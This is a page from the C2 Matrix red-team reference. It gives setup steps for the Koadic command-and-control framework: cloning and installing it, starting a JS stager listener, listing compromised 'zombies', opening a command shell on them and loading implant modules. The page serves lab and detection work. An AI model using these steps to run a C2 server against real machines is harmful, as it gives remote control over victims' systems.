C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix VM
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By
GitBook
Koadic
Install Koadic
1
cd /opt/
2
git clone https://github.com/zerosum0x0/koadic
3
cd koadic
4
apt-get install python3-pip
5
pip3 install -r requirements.txt
Copied!
Run Koadic
1
sudo
koadic
Copied!
Listener
1
use stager/js/
2
set
SRVHOST
<
IP
>
3
set
SRVPORT
443
4
run
Copied!
Interact
1
zombies
Copied!
Post Modules
1
cmdshell
<
zombie ID
>
2
use implant/
3
set
PAYLOAD
0
4
set
ZOMBIE
0
Copied!
Notes
1
Spawns rundll32.exe
2
HTTP Long Polling https://www.pubnub.com/blog/http-long-polling/
3
Continuous connection
4
Logging in JSON: /opt/koadic/restores
5
Proxy awareness doesn’t work: https://github.com/zerosum0x0/koadic/issues/55
6
Stagers: 6
7
Implants: 44
Copied!
C2 - Previous
ibombshell
Next - C2
Merlin
Last modified
2yr ago
Copy link
Contents
Install Koadic
Run Koadic
Listener
Interact
Post Modules
Notes